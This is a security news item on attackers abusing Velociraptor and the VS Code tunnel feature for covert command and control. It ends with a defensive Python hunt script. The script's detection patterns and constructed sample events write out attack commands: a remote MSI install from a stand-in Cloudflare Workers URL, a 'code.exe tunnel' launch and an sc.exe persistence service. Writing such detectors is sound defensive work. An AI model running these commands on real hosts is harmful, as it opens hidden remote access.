Cybersecurity and Information Warfare

Attackers exploit Velociraptor, VS Code for covert C2 via Teams.

Attackers have begun abusing Velociraptor, a legitimate open-source DFIR tool, to silently deploy Visual Studio Code's tunneling feature as a covert command-and-control channel. The Sophos Counter Threat Unit (CTU) detailed an August 2025 intrusion in which Velociraptor was installed with msiexec from a Cloudflare Workers domain and then used to download and run VS Code with tunneling enabled, most likely to reach an attacker-controlled C2 endpoint. The activity triggered Taegis alerts, and the host was isolated quickly enough that ransomware deployment was likely prevented.

The tradecraft fits a broader 2025 trend of social engineering and IT-support impersonation over Microsoft Teams, in which threat actors coax users into enabling remote assistance or running scripts. Because the lure arrives in chat rather than email, it bypasses email defenses and shortens the path to privilege escalation and persistence, as documented in multiple April–August 2025 reports and incident summaries.

Investigators also note the staging of additional tools (e.g., a Cloudflare tunnel client, Radmin) and service-based persistence for code.exe. The recommended defenses are to monitor continuously for Velociraptor executions that were not initiated by your own DFIR team, to enforce strict application control backed by EDR anomaly detection, and to isolate affected hosts rapidly so that the ransomware precursors observed in late August 2025 advisories and news roundups are disrupted before encryption begins.
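The detection side of this, as an added example that is not code from the Sophos CTU report, from Velociraptor, or from any vendor product: a small Python hunt over process-creation records that flags each link of the chain described above (msiexec pulling an MSI from an http(s) URL, Velociraptor running on a host outside a DFIR allow-list, code.exe launched with the tunnel subcommand, and an sc.exe service wrapping code.exe) and escalates any host that shows two or more links. The field names mirror Sysmon Event ID 1 / Security 4688, but the records, the rule names, the APPROVED_VELOCIRAPTOR_HOSTS allow-list and the staged-tool binary names are constructed assumptions for this example, not telemetry from the incident.

```python
"""Hunt for the Velociraptor -> VS Code tunnel chain in process-creation telemetry.

Added example: the records, rule names and allow-list are constructed for
illustration and are not from the Sophos CTU report or any real telemetry.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Assumption: the only hosts your DFIR team runs Velociraptor from; anything else is unauthorized.
APPROVED_VELOCIRAPTOR_HOSTS = {"IR-BOX"}

# msiexec /i pointed at an http(s) URL: a package fetched straight from the internet.
REMOTE_MSI = re.compile(r'/i\s+"?https?://', re.IGNORECASE)
# "code.exe tunnel ..." is the VS Code Remote Tunnels subcommand.
TUNNEL_ARG = re.compile(r"(^|\s)tunnel(\s|$)", re.IGNORECASE)
# sc create ... binPath= ...code.exe: a Windows service wrapping the VS Code binary.
SC_CREATE_CODE = re.compile(r"\bcreate\b.*binpath=.*code\.exe", re.IGNORECASE)
# Assumed binary names for the staged tools mentioned in the write-up.
STAGED_TOOLS = {"cloudflared.exe", "radmin.exe"}
# Rules that are links in the intrusion chain; two or more on one host is a strong signal.
CHAIN_RULES = {"msiexec_remote_install", "velociraptor_unapproved_host",
               "vscode_tunnel", "service_persistence_vscode"}


def evaluate(event):
    """Return the rule names a single process-creation event triggers."""
    name = PureWindowsPath(event["image"]).name.lower()
    cmd = event["cmdline"]
    hits = []
    if name == "msiexec.exe" and REMOTE_MSI.search(cmd):
        hits.append("msiexec_remote_install")
    if name == "velociraptor.exe" and event["host"] not in APPROVED_VELOCIRAPTOR_HOSTS:
        hits.append("velociraptor_unapproved_host")
    if name == "code.exe" and TUNNEL_ARG.search(cmd):
        hits.append("vscode_tunnel")
    if name == "sc.exe" and SC_CREATE_CODE.search(cmd):
        hits.append("service_persistence_vscode")
    if name in STAGED_TOOLS:
        hits.append("staged_remote_access_tool")
    return hits


def hunt(events):
    """Group hits per host and rate severity by how much of the chain is present."""
    per_host = defaultdict(lambda: {"rules": set(), "events": []})
    for ev in events:
        hits = evaluate(ev)
        if hits:
            per_host[ev["host"]]["rules"].update(hits)
            per_host[ev["host"]]["events"].append((ev["ts"], ev["image"], hits))
    findings = {}
    for host, data in per_host.items():
        links = data["rules"] & CHAIN_RULES
        if len(links) >= 2:
            severity = "critical"   # several links of the chain on one host: isolate now
        elif links:
            severity = "high"       # one link: triage before it becomes a chain
        else:
            severity = "medium"     # a staged tool only
        findings[host] = {"severity": severity, "rules": sorted(data["rules"]),
                          "events": data["events"]}
    return findings


# Constructed sample events (Sysmon Event ID 1 / Security 4688 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-042", "ts": "2025-08-14T09:12:01Z", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i https://example-worker.workers.dev/velociraptor.msi /qn"},
    {"host": "WS-042", "ts": "2025-08-14T09:12:40Z",
     "image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": r"Velociraptor.exe --config client.config.yaml client"},
    {"host": "WS-042", "ts": "2025-08-14T09:15:22Z", "image": r"C:\Users\Public\code\code.exe",
     "cmdline": r"code.exe tunnel --accept-server-license-terms --name ws042"},
    {"host": "WS-042", "ts": "2025-08-14T09:16:05Z", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc.exe create VSCodeTunnel binPath= "C:\Users\Public\code\code.exe tunnel" start= auto'},
    # Benign: a developer opening a folder in a normally installed VS Code.
    {"host": "WS-017", "ts": "2025-08-14T10:02:11Z",
     "image": r"C:\Users\devuser\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": r'"Code.exe" --folder-uri file:///C:/src/project'},
    # Benign: the DFIR team's own Velociraptor on an approved host.
    {"host": "IR-BOX", "ts": "2025-08-14T10:30:00Z",
     "image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": r"Velociraptor.exe --config server.config.yaml frontend"},
]

if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {finding['severity']} {finding['rules']}")
```

The allow-list is the part that needs real thought: Velociraptor is a legitimate tool, so the only reliable signal is "running somewhere your DFIR team did not put it", which means the allow-list (and the expected install path, if you want to add that check) has to be maintained against change control, not guessed.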
